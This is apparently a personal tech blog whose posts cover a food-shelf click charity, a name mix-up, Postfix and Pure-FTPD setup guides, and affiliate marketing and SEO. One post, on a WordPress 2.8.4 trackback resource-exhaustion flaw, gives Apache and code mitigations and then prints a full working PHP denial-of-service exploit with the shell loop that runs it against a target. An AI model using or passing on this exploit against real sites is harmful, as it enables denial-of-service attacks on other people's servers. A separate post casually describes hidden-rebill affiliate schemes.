Help Fill Food Shelves
Kare 11 & Land O’Lakes are donating $1 for every person who clicks on their web site. Go to the website listed below and in the upper right corner you will see a small banner: You Click, We Donate . Just simply click on that banner. It’s that easy.
http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx
All it takes is a few seconds, and the money generated can go a long way to help people in need.
It Wasn’t Me
I noticed a spike in traffic yesterday and wondered what the heck was going on. I looked more into it and found out someone with the same name as me had charges filed against them for Conspiracy to Commit Securities Fraud.
More information can be found here: http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna
I’d just like to say that if you made it here searching for that guy, I’m not him.
I’m a 24 (25 in a couple days) year old IT geek from Minnesota, not a manager for a hedge fund committing suspected insider trading.
New 0-Day Wordpress Exploit
Wordpress is vulnerable to a very dirty exploit right now as of 2.8.4. There’s a resource exhaustion DoS that is floating around the public right now. It’s a vulnerability in wp-trackbacks.php that hurts.
Here’s the results from a quick test against my server:
13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24
Very dirty.
Here’s a temporary fix that can be implemented until we get a real patch.
Add the following lines to your Apache 2 config file:
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
This should be placed in the main config, not a virtual hosts config. This will disable any URLs with “wp-trackback.php” in it. This is a quick and ugly fix, but will help against this attack.
I expect Wordpress will have an update soon.
UPDATE: With the help of a friend we have created a quick fix:
In line #47 of wp-trackback.php, add this:
if(strlen($charset) > 50)
die;
Here’s the actual exploit.
<?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* security@wordpress.org contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org>
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) < 2)
die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
$path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
$fp = @fsockopen($data['host'],80);
if(!$fp)
die("unable to connect to: ".$data['host']."\n");
$pid[$n] = pcntl_fork();
if(!$pid[$n]){
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n");
echo "hit!\n";
}
}
?>
Postfix Maildrop Spam Folder
Filtering spam in Postfix is pretty simple. There’s some advanced techniques you can use, but simply setting up Spamassassin will suit many people. One downside is seeing all the ***** SPAM ***** mails in your inbox. It took a while to come up with a solution, but the best fit so far has been implementing Maildrop to automatically move those files to a Junk folder. Here’s the steps to set this up on a Debian 5.0 system with Postfix and Spamassassin.
First, setup your /etc/maildroprc file:
# commands and variables for making the mail directories
maildirmake=/usr/bin/maildirmake
mkdir=/bin/mkdir
rmdir=/bin/rmdir
MAILDIR=$DEFAULT
# make the user's mail directory if it doesn't exist
`test -e $MAILDIR`
if ($RETURNCODE != 0)
{
`$mkdir -p $MAILDIR`
`$rmdir $MAILDIR`
`$maildirmake $MAILDIR`
}
# make the .Junk folder if it doesn't exist
JUNK_FOLDER=.Junk
_JUNK_DEST=$MAILDIR/$JUNK_FOLDER/
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0 )
{
`$maildirmake $_JUNK_DEST`
#auto subscribe. the following works for courier-imap
`echo INBOX.Junk >> $MAILDIR/courierimapsubscribed`
}
# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
{
exception {
to $DEFAULT/.Junk/
}
}
The comments clearly state what’s going on there.
Once that’s setup, you will go into your /etc/postfix/master.cf and make sure the
maildrop unix - n n - - pipe
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
is not commented out.
Next you will have to set the /usr/bin/maildrop file setuid root. This is so maildrop can interact with authdaemon and the mail folders.
#chmod +s /usr/bin/maildrop
The last thing you have to do is add this to your /etc/postfix/main.cf file:
virtual_transport = maildrop maildrop_destination_recipient_limit = 1
If there is another virtual_transport line, be sure to comment that out first.
And that’s all. Nice and simple way to handle all that Junk mail.
Debian Pure-FTPD Virtual Users Howto
After being a dedicated Gentoo user, I’ve recently moved over to Debian. Hoping to work more on productive tasks, than just administrating my servers. In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different than Gentoo.
I thought I’d write up a quick how to on how to configure Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in hope someone else will be able to put it to use. And here we go..
Enable PureDB authentication:
# cd /etc/pure-ftpd/auth
# ln -s ../conf/PureDB 50pure
To disable PAM authentication and UNIX authentication so you only have virtual users:
# echo no > /etc/pure-ftpd/conf/PAMAuthentication
# echo no > /etc/pure-ftpd/conf/UnixAuthentication
That’s it. Simple, but when coming from a single config file, this isn’t at all intuitive – at least to me.
I’ve always recommended Pure-FTPD for it’s security, features, and simplicity. You can find out more information at the official Pure-FTPD projects website: www.Pure-FTPD.org
First Profitable Campaign
Posted by steve in Affiliate Marketing on July 9, 2009
Haven’t posted in a while – as there wasn’t really anything to talk about. I’ve established a handful of arcade sites in the last few weeks. My goal there is to build up a solid network so I can trade traffic between the sites, and give myself some sites to link from when exchanging links for hubits. Some of the sites are: gemarcade.com, arcadeswamp.com, digarcade.com, castledefence.org, parkinggame.net, and instarcade.com. There’s a few others, but not worth mentioning.
But I have managed to run into an affiliate network that has been very helpful in getting me setup with a campaign. I’m currently running some Facebook ads for a simple free signup. Low payout, but also low cost to advertise. It’s pretty exciting, and I’m hoping to simply generate some revenue I can invest into some bigger offers. I’d love to share all the details, but I’m not at the point where I can afford to, or know enough about it to be more useful than the many other sites talking about it. One being nickycakes.com.
The campaign really wasn’t anything to brag about. Simply making $10 on a $80 investment. But for me it’s a relief to finally break even, let alone make money. Well, let’s hope the earnings go up from here.
Taking a step back
Well I got this site up and going, got on to the first page of when searching Google for Steve Fortuna…and I have no readers.
Blogging to myself is a blast! Haha, no. Blogging is kind of entertaining, but not really my thing. I’m going to take a step back, and focus less on posting regularly. What’s the point, right? When the traffic picks up, or I come up with some really good post ideas, I wont hesitate to post.
And I’m out.
Affiliate Marketing
Posted by steve in Affiliate Marketing on May 27, 2009
I’ve heard a lot about affiliate marketing in the past, but was never really interested. It seemed to me that you just sold products for someone else for a tiny piece of the profit. Seemed pointless, and a lot of effort for not much return.
That was until I read through a blog called Nickycakes. The title of the blog is Reformed Blackhat, which seemed interesting. I ended up at the newbie affiliate marketing section – and boy did it peak my interest. This guy has an attitude I like, gets straight to the point, and opened up a whole new way of making money online for me.
After reading through the entire guide, I decided I would give affiliate marketing a shot. Essentially what you do is create a page, or landing page, and send traffic to it. The goal of the landing page is to convince the user to sign up/buy/do whatever for your product. These can be anywhere from simple ad looking pages, to review sites, or even flogs (fake blogs). The whole idea of it seems real interesting so I started right up.
Turns out it is a lot more shady than I had expected. A lot of money is made on rebills (billing someone after the initial $2 or whatever), generally without their knowledge. Terms of Service stating the rebill is hidden at the bottom of the page or anywhere out of sight. Most of the products are sub par, and a Google search reveals them to be mostly a scam.
Now I personally wouldn’t be opposed to promoting some of the products, as it’s not like you’re stealing. Technically the terms are explained to them. It’s like the offer is an IQ test in iteself (one of the products offered). If they don’t sign up, average to above average IQ, but if they do – they fail the IQ test. Haha. But this is only one method of affiliate marketing.
One other type of affiliate marketing I’ve began to explore is local affiliate marketing. You don’t sell a product hundreds, if not thousands, of others are selling online. You sell local products/services that local businesses provide. This, in my opinion, is a lot more ethical – and even has a chance to earn a lot more money.
Simply contact businesses and setup relations to sell products for them. I am three days into my first campaign of local affiliate marketing, and experimenting with PPC advertising and some SEO advertising. Nothing interesting to report, as the 20 people total who went to my landing page so far aren’t a good display of the results I should expect. It’s fun and interesting though. The potential is there, it’s just making it work.
For more information on local affiliate marketing, check out: http://www.shoemoney.com/2008/11/04/making-money-with-local-affiliate-programs
Ranking In Google
Posted by steve in Search Engine Optimization on May 14, 2009
Well that didn’t take long. It was four days since I launched this site, and google pushed me up to #1 for the keyword: Steve Fortuna. It really wasn’t very hard at all. I purchased this domain September of 2008, and had a simple ‘coming soon…’ page up. I just had to convince Google to crawl the page again, and that the content was relevant.
Being that I had the domain that fully matched the search term I was targeting, it was pretty easy. That’s always a major consideration when deciding what domain to purchase. Trying to throw at least one keyword you’re trying to target in the domain is always helpful. It’s not required, of course, but helps quite a bit. stevefortuna.com ranked #1 for the keyword ‘Steve fortuna’ very easily. A couple links in with the anchor text ’steve fortuna’ was all that was needed.
Deciding whether you want to go with a keyword domain or a brandable domain is just simply a matter of your goals. If you’re looking for quick ranking for low competition keywords, a keyword domain would be key. But if you’re going take the time to build a brand, go with a domain you like – something brandable. Two examples of these are of course, stevefortuna.com, with intended target for: steve fortuna, and then hubits.com, with intended target: free arcade games.
Sulumits Retsambew
Posted by steve in Search Engine Optimization on May 11, 2009
Sulumits Retsambew is the target keyword for a new search engine optimization contest hosted by NetBuilders.org. For those that aren’t familiar with SEO contests, it’s essential a competition to outrank others in Google, or any other search engine depending on the specific contest.
The term sulumits retsambew written backwards is webmaster stimulus. This is NetBuilders way of running a “stimulus package” for webmasters. The contest started March 15th, and runs through August 15th. Which is quite a while for a SEO contest. But also a good way to judge the effects of SEO over time. Will blackhat methods win, or will pure whitehat SEO come out on top? Only time will tell.
The prizes for the contest are as follows: $1000 for first, $500 for second, and $250 for third. $1000 is a nice payout and would be nice to grab for anyone.
Currently my entry in the sulumits retsambew contest is WebmasterStimulus.org. All the exact keyword domains were taken by the time I got started. I’m hoping all the mention of the term webmaster stimulus on all the sulumits retsambew sites will convince google that they are related, and in turn give the WebmasterStimulus.org domain a lot of weight based on the keywords in the domain. This may already be the case as I’m currently in second position.
I am relatively new in the SEO world. I midly got interested in it about six months ago, but really didn’t make any progress or really understand what I was doing until a few months ago. It will be interested to see how my skills will stand up against the experts.
I found what I consider a real nice template for the site WebmasterStimulus.org, and decided to use it on this blog as well. I’m sure you have by now noticed the similarities.